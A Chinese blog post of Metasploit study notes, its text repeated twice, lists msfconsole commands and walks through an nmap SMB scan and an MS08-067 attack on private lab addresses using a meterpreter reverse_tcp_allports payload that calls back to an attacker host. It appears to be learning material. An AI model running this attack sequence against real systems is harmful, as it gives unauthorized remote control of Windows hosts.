metasploit 读书笔记-EXPLOITATION
2014-04-02 15:36
246 查看
一、渗透攻击基础
1.常用命令
show exploits 显示Meta框架中所有可用的渗透攻击模块。
show options 显示模块所需要的各种参数
back 返回Meta的上一个状态
search 查找模块
use 使用模块
show payloads 输入此命令时,Meta只会将与当前模块兼容的攻击载荷显示出来;
set payload 选择需要的payload
show targets 列出受到漏洞影响目标系统的类型
注意:Auto Targeting 攻击模块通过目标系统的指纹信息,自动选择操作系统版本进行攻击。但是,在做攻击时最好是通过人工确认目标系统的系统类型等相关信息,准确的制定攻击,避免发生错误的、破坏性的攻击。
set 与unset :设置某个参数与禁用相关参数
set TARGET 可以设置目标系统类型
setg 与 unsetg 对全局参数进行设置和清除
save 将当前设置保存下来
二、攻击实例
nmap -sT -A --script=smb-check-vulns -P0 192.168.3.13
注意参数:-sT 是隐秘的TCP连接扫描(Stealth TCP connect),这个参数进行端口枚举是最可靠的。
-sS 隐秘的TCP Syn扫描
-A 高级操作系统探测功能(advanced OS detection)
2、全端口攻击payloads:暴力猜解目标开放的端口
对所有可用的端口进行尝试
use windows/smb/ms08_067_netapi
set LHOST 192.168.33.129
set RHOST 192.168.33.130
set TARGET 3
search ports
set PAYLOAD windows/meterpreter/reverse_tcp_allports
exploit -j
3、资源文件Resource files
MSF终端内包含一系列自动化命令的脚本文件。
1.常用命令
show exploits 显示Meta框架中所有可用的渗透攻击模块。
show options 显示模块所需要的各种参数
back 返回Meta的上一个状态
search 查找模块
use 使用模块
show payloads 输入此命令时,Meta只会将与当前模块兼容的攻击载荷显示出来;
set payload 选择需要的payload
show targets 列出受到漏洞影响目标系统的类型
注意:Auto Targeting 攻击模块通过目标系统的指纹信息,自动选择操作系统版本进行攻击。但是,在做攻击时最好是通过人工确认目标系统的系统类型等相关信息,准确的制定攻击,避免发生错误的、破坏性的攻击。
set 与unset :设置某个参数与禁用相关参数
set TARGET 可以设置目标系统类型
setg 与 unsetg 对全局参数进行设置和清除
save 将当前设置保存下来
二、攻击实例
nmap -sT -A --script=smb-check-vulns -P0 192.168.3.13
注意参数:-sT 是隐秘的TCP连接扫描(Stealth TCP connect),这个参数进行端口枚举是最可靠的。
-sS 隐秘的TCP Syn扫描
-A 高级操作系统探测功能(advanced OS detection)
2、全端口攻击payloads:暴力猜解目标开放的端口
对所有可用的端口进行尝试
use windows/smb/ms08_067_netapi
set LHOST 192.168.33.129
set RHOST 192.168.33.130
set TARGET 3
search ports
set PAYLOAD windows/meterpreter/reverse_tcp_allports
exploit -j
3、资源文件Resource files
MSF终端内包含一系列自动化命令的脚本文件。
相关文章推荐
- Hacking: The Art of Exploitation 读书笔记(二)C文件I/O
- Metasploit 读书笔记
- metasploit 读书笔记-信息收集
- WebApp exploitation with Arachni and Metasploit
- Metasploit之Post Exploitation
- Metasploit 读书笔记-持久控制
- Hacking: The Art of Exploitation 读书笔记(一)代码调试技巧
- Metasploit 读书笔记-神器Meterpreter
- 零起点学习WPF之《WPF揭秘》读书笔记(5)——第三章
- 读书笔记 Effective C++: 02 构造析构赋值运算
- 【读书笔记】莫比乌斯函数与莫比乌斯反演
- 《我是一只IT小小鸟》读书笔记
- 《Java并发编程实战》第九章 图形用户界面应用程序界面 读书笔记
- 【读书笔记】数据库之关系数据库语言(SQL3)
- 《JavaScript语言精粹》读书笔记
- 读书笔记-Thinking in Java01-对象导论+一切都是对象
- 程序员思维修炼 --- 读书笔记(二)
- 读书笔记-《Spring技术内幕》-计文柯(一):IoC容器的实现
- MetaSploit常用命令 ruby读写文件
- 读书笔记-深度探索C++对象模型-Chapter3